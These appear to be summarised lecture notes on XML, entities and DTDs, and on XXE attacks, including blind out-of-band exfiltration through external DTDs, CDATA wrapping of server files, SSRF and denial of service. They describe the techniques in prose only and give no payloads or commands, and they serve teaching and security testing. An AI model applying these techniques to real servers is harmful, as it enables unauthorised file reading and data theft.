🛡️

XML and XXE Vulnerabilities

Jun 12, 2025

Overview

This lecture explains XML (Extensible Markup Language), its structure, entities, and security vulnerabilities such as XXE (XML External Entity) attacks, including real examples and methods of exploitation.

What is XML?

  • XML stands for Extensible Markup Language, used for data transportation and sometimes storage.
  • XML is human-readable and widely used in APIs, UI layouts, Android apps, config files, and RSS feeds.
  • Each XML document requires exactly one root element.
  • Tags in XML are case-sensitive; opening and closing tags must match exactly.
  • Special characters like quotes and angle brackets are not allowed directly; entities are used instead.

XML Entities and DTDs

  • Entities act as variables, defined in the Document Type Definition (DTD) section.
  • There are three types: general (for values), parameter (within DTDs), and predefined (for special characters).
  • Predefined entities replace symbols like < or & to avoid breaking the XML document.

External Entities and XXE Attacks

  • Entities can refer to external files or URLs using the SYSTEM keyword, enabling XML External Entity (XXE) attacks.
  • By referencing files or URLs in an entity, attackers can read server files or make requests as the server.
  • Types of XXE: in-band (output shown), error-based (blind, only errors shown), out-of-band (OOB, data exfiltrated via external requests).

Blind XXE and DTD Manipulation

  • Blind XXE uses external DTDs to exfiltrate data when there is no direct output.
  • Internal DTDs have restrictions on parameter entity usage; external DTDs do not.
  • By loading a malicious external DTD, complex exfiltration payloads can be constructed.

Handling Parsing Issues and CDATA

  • If file content includes symbols or pseudo-XML, parsing may break.
  • CDATA sections allow raw data to be included without being parsed as markup.
  • Parameter entities and external DTDs can help wrap CDATA around sensitive data for exfiltration.

Further XXE Impact and Use Cases

  • XXE can also be used for Denial of Service (DoS) and Server-Side Request Forgery (SSRF).
  • XML vulnerabilities exist in file types beyond APIs, such as SVG, PDFs, and Office docs.
  • Different parsers may behave differently; always test and validate.

Key Terms & Definitions

  • XML — Extensible Markup Language for transporting and storing data.
  • Entity — Variable-like storage used in XML, defined in DTDs.
  • DTD — Document Type Definition, section for defining XML structure and entities.
  • XXE (XML External Entity) — Security vulnerability where XML entities reference external resources.
  • CDATA — Character Data section that prevents parsing of enclosed text as XML markup.
  • SSRF (Server-Side Request Forgery) — Attack where server makes unauthorized requests due to crafted input.

Action Items / Next Steps

  • Review how to define and use entities and DTDs in XML.
  • Practice constructing benign and malicious XML documents to understand parsing behavior.
  • Explore the use of external DTDs for both legitimate and security testing purposes.